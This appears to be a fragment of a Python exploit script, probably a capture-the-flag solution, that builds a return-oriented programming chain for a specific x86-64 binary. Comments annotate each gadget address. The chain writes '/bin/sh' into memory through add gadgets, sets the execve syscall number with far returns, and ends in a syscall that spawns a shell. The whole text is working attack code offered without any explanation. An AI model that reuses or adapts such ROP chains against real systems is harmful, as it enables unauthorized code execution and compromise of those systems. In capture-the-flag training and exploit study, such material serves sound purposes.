payload = p64(0x40125d)
#0x000000000040125d: pop rbp; ret; 
payload += p64(0x44d232)+p64(0x41e9f4)
# 0x000000000041e9f4: pop rbx; ret 2; 
payload += p64(0x80)+p64(0x40125c)+"\x00"*2
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x44d0ad)+p64(0x41e9f4)
# 0x000000000041e9f4: pop rbx; ret 2; 
payload += p64(0x6e69622f)+p64(0x40125c)+"\x00"*2
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x44d0b1)+p64(0x41e9f4)
# 0x000000000041e9f4: pop rbx; ret 2; 
payload += p64(0x68662f)+p64(0x40125c)+"\x00"*2
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x44d070)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x36b4d00a)+p64(0x0)+p64(0x41e1b9)
# 0x41e1b9: xchg esi, eax ; retf 2
payload += p32(0x401553)+p32(0x33)+"\x00"*2
# 0x0000000000401553: add edx, dword ptr [rax - 0x366ffe15]; ret; 
payload += p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x3b)+p64(0x0)+p64(0x41e1b9)
# 0x41e1b9: xchg esi, eax ; retf 2
payload += p32(0x4017d1)+p32(0x33)+"\x00"*2
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x41fca0)
# 0x000000000041fca0: syscall; 
payload += b''
